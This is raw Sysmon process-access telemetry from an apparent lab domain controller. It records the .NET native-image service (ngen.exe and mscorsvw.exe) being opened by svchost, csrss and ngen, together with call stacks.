13:46:18.093{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C401-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C301-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.062{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C301-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C301-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C201-00000000A301}2604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.015{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C201-00000000A301}2604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C201-00000000A301}2604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CF01-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.671{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CF01-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.671{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CF01-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.625{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CE01-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.609{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CE01-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.609{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CE01-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.500{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CD01-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.484{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CD01-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.484{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CD01-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.437{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CC01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.437{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CC01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.437{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CC01-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.265{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CB01-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.234{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CB01-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.234{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CB01-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.171{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CA01-00000000A301}4792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d3